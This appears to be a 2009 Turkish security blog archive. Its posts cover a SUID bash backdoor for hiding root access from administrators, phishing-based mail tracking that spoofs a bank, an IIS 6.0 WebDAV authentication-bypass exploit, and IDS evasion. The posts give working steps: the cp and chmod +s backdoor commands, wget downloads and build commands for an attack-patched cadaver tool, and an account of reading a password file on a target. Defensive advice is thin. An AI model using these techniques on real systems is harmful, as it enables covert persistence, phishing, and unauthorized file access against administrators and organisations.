Archive for the ‘ Güvenlik ’ Category

Suid Backdoor

Parametresini unutup her bahsi geçildiğinde hatırlamaya çalıştığım ve bulmak için, iki saat nasıldı bu diye deneyip durduğum parametreyi buraya yazayım. Hem lazım olduğunda bulmam kolay olsun. Hemde bilmeyen varsa öğrenmiş olur :-)

Öncelikle root yetkilerine sahip olmuş olmanız gerekiyor. Nasıl root olacağınız bu yazının dışında kalan bir konu. Biz root olduktan sonrası ile ilgileniyoruz :-)

İlk olarak aşağıdaki komutlarla bash kabuğunun bir kopyasını alalım. Ben kendi ev dizinime kopyalamayı tercih ettim. Daha sonra chmod ile suid olarak ayarlayalım.

Kod:
mordor ~ # cp /bin/bash ~harun/backdoor
mordor ~ # chmod +s ~harun/backdoor

Artık  suid arkakapımız hazır. Bundan sonra yapmamız gereken -p parametresi ile ev dizinimize aldığımız suid bash kabuğumuzun kopyasını çalıştırmak olacak…

Kod:
harun@mordor ~ $ whoami
harun
harun@mordor ~ $ ./backdoor -p
harun@mordor ~ # whoami
root

Gençliğimizde, kullanıcı hesabımızın olduğu sistemlerde, sistem yöneticinden saklanıp zaman zaman root olabilmek için kullandığımız eski bir yöntem :-)

Saygılarımla…

Etiketler:
2009
09/10
YAZAR
seker
DİZİN
Güvenlik
Yorum yazın

MailTracking

İzsürmeyi Tanımlamak
- iz sürme medotlu bir şekilde bir hedefin güvenlik profili hakkında bilgi toplamaktır.
- İz sürme 3 ön saldırı evresinden biridir.Diğerleri tarama ve enumeration dır.
- Kısacası iz sürme hedefin sistemleri (interneti,intraneti,extraneti ve wireless) hakkında
bilgi toplamaktır.

Bilgi Toplama Teknolojisi FootPrinting
- Bilgiyi ortaya çıkarmak
- Network ip aralığını bulmak
- Aktif makinaları bulmak
- Açık portları ve access point leri bulmak

Bu yazıda iz sürmede kullanılan etkili tekniklerden biri olan mailtracking e değinilecek , örneklerle kısaca açıklanacaktır.

MailTracking ; mail yolu ile iz sürme metodudur.
Bu iş için www.mailtracking.com ve www.pointofmail.com adressleri kullanılabilir.

Örnek Senaryo ;

Saldırgan , X A.Ş firmasının sistem yöneticisinin mail adresini bulmuştur ve saldırı öncesi hedefin ip adressi , browser bilgileri ve bulunduğu bölge gibi bilgileri edinmek istiyor.Bunu X A.Ş firmasının sistem yöneticisine  sahte bir mail adresinden yada kendina ait bir mail adresinden mail göndererek yapabilir.

Kurbanın mail adresine , Garani Bankasına ait bir mail adresinden (kurbanın garanti mağduru olduğu düşünülmüştür) banka hesabına ilişkin bir mail gönderilerek son derece gerçekçi bir saldırı yapılır ve kurbanın maili açması kaçınılmazdır : )

Mail gönderilen sayfadan bir görüntü , info@garanti.com.tr den kurbanın mail adresine (mail@ozanucar.com) bir mail gönderilir.

Kurban gelen maili açar ,

ve kurbanın tüm bilgileri yönetim sayfasına gelir ,

Korunma Yöntemleri ;

- Resim , dosya vb. ek bulunan mailleri görüntülerken kaynağının ve içeriğin güvenliğinden emin olmadan resimleri aktif etmeyin ve dosyaları açmayın.
- Gelişmiş antispam yazılımları kullanın , gelen fake mailleri aklı başında bir antispam yazılımı belirttiğiniz kurallara göre filtreleyecektir.

Bu bilgiler  saldırganın yeni ataklar yapmasını kolaylaştıracaktır. Browser , e-posta okuyucusunun açıklığından faydalanarak hacking yapabilir.
Bknz: FireFox 3.5 , ThunderBird

Etiketler: , , ,
2009
09/10
YAZAR
ozan
DİZİN
Güvenlik
TAGS


3 yorum

Microsoft IIS 6.0 WebDAV Açığı, Tespiti, Exploit Edilmesi ve Korunma Yolları

CVE-2009-1676 güvenlik bülteni ile Microsoft IIS 6.0 web sunucusunun dosya paylaşımı için kullandığı “Webdav” servisinde uzakdan kimlik doğrulamayı bypass eden bir zaafiyet bulunduğu duyuruldu.

Web sunucuda bulunan klasorlere ve dosyalara erişim için Windows Authentication gerektiren kimlik doğrulama unicode kullanılarak bypass edilebiliniyor.
Yetki dahilinde dosya okumak, dizin listelemek ve uzak sunucuya dosya yazmak (içerik eklemek) mümkün.

Bu makalede bu işlemin nasıl yapıldığı ve korunma yollarına değinilmiştir.

Aktif Webdav Servisinin Tespiti

IIS 5.0 da Webdav servisi varsayılan olarak açık gelir.IIS 6.0 sunucularda ise webdav servisi varsayılan olarak aktif değildir.

IIS sunucuda Webdav servisinin aktif olduğunu Nmap NSE sciprti ve Enumaration araçları ile tespit edebiliriz.

Nmap NSE scriptine http://ack-rst.com/scripts/webdav.nse adresinden ulaşabilirsiniz.

Nmap ile ozan.net adresindeki IIS 6 sunucunun Webdav servisinin aktif olduğunu öğrendik.

Exploit (Suistimal)

Bu zaafiyeti kullanarak hedef sistemde yapılacak işlemler hakkında aşağıdaki videoyu izleyebilirsiniz.

http://www.cehturkiye.com/iis6webdav/iis6webdav.html

Bilgisayarınıza indirmek için ;
http://www.4shared.com/file/107065019/de6006aa/iis6webdavvulnerabilty.html

Skullsecurity.org  tarafından açığı sömüren otomize edilmiş bir betik yayımlandı.

Kurulumu ve kullanımı aşağıdaki gibidir ;
1-mkdir webdav
2-cd webdav
3-wget http://www.skullsecurity.org/blogdata/cadaver-0.23.2-h4x.patch
——
4-wget http://www.webdav.org/cadaver/cadaver-0.23.2.tar.gz
——
5-tar xzvf cadaver-0.23.2.tar.gz
——
6- cd cadaver-0.23.2/
7- patch -p1 < ../cadaver-0.23.2-h4x.patch
patching file lib/neon/ne_basic.c
patching file lib/neon/ne_request.c
patching file lib/neon/ne_uri.c
7-./configure
——
8- make
——

Yukarıdaki adımlardan sonra “cadaver” aracı kurulmuş olucak.

./cadaver xx.xx.xx.xx şeklinde kullanabilirsiniz.

Artık dav:/> satırına düştükden sonra savunmasız dizine geçebilir.Neler olduğunu görüntüleyerek yetki dahilinde istediğiniz işlemi yapabilirsiniz.

Yapılacak işlemler için aşağıdaki komutlar kullanılır ;
* CD
* LS
* MOVE
* PUT
* GET
* CAT
* DELETE

ozan.net hedefi exploit edilerek, “gizli” klasorundeki “parola.txt” içeriği okunmuştur.

Bu zaafiyetten korunmak için;
- Webdav servisi kullanılmıyorsa kapatın.
-Webdav ile paylaşılan klasorlerin/dosyaların yetkilerini düzenleyin
-Microsoft’un yama çıkarmasını bekleyin :(
-Eğer bir IDS/IPS sisteminiz var imza veritabanını güncelleyin.

Etiketler: , , , , ,
2009
05/22
YAZAR
ozan
DİZİN
Görsel Anlatımlar
Güvenlik
TAGS



1 yorum

ISA SERVER – Kaçak Giriş Tespit ve Engelle Sistemi (IDS/IPS)

Isa server 2006, kaçak giriş tespit ve saldırı engelleme sistemleri arasında bulunan bir Microsoft çözümüdür.

Isa Server 2006 Firewall,İçerik Filtreleme ve Cache özelliği yanı sıra  kaçak giriş tespit ve saldırı engelleme  özelliği de bulunmakta.Bu özelliği ile bulunduğu networkü saldırılara karşı korumaktadır.

IDS, Firwall ve Honeypotlar” başlıklı makalemde Kaçak Giriş Tespit ve Saldırı Engelleme Sistemleri (Intrusion Detection and Intrusion Prevention Systems) hakkında detaylı bilgi bulabilirsiniz.

ISA Server 2006 nın bu özelliğini, port scanning, ip spoof ve syn flood saldırıları yaparak kücük bir test yaptım.
Üzülerek söylemeliyim ki, her IDS/IPS sistemi gibi ISA Server’da saldırıları tespit etmede ve engellemede pek başarılı sayılmaz.
ID sistemleri atlatmanın bariz yolları günümüzde kısmen gerçeli olmakta, saldırılar maskelenerek sistemler atlatılabilmektedir ;
-Birçok nasit IDS imza tespiti ile çalışır.
-Saldırı scriptlerinin imzaları veritabanında kayıtlıdır bunun la saldırıyı karşılaştırır, script
üzerinde ufak değişiklik IDS ten geçmesine sebep olur.
-IDS leri geçme imza benzeşmesini uyumsuz hale getirmekle olur.
-Örnek olarak bazı pop3 serverlar uzun şifre girmek gibi bufer overflow saldırılarına karşı zayıftırlar , Script üzerinde basit değişiklikle bu saldırı maskelenebilir.Parçalanmış paketlerle IDS atlatılabilir.

Diğer saldırı, kaçak giriş denemeleri ve ISA Server’ı atlatmanın yollarını FORUM sayfamızda paylaşıp tartışıcaz.
Videoyu bilgisayarınıza indirmek için ;
http://www.4shared.com/file/102238546/1019f494/ISAServer2006-IDSIPS.html

Tam ekran izlemek için ;
http://www.cehturkiye.com/IsaServer2006/ISAServer2006-IDSIPS/ISAServer2006-IDSIPS.html

Saygılarımla…

Etiketler: , , , , , , ,
2009
04/28
YAZAR
ozan
DİZİN
Firewall
Görsel Anlatımlar
Güvenlik
Püf Noktalar
TAGS



Yorum yazın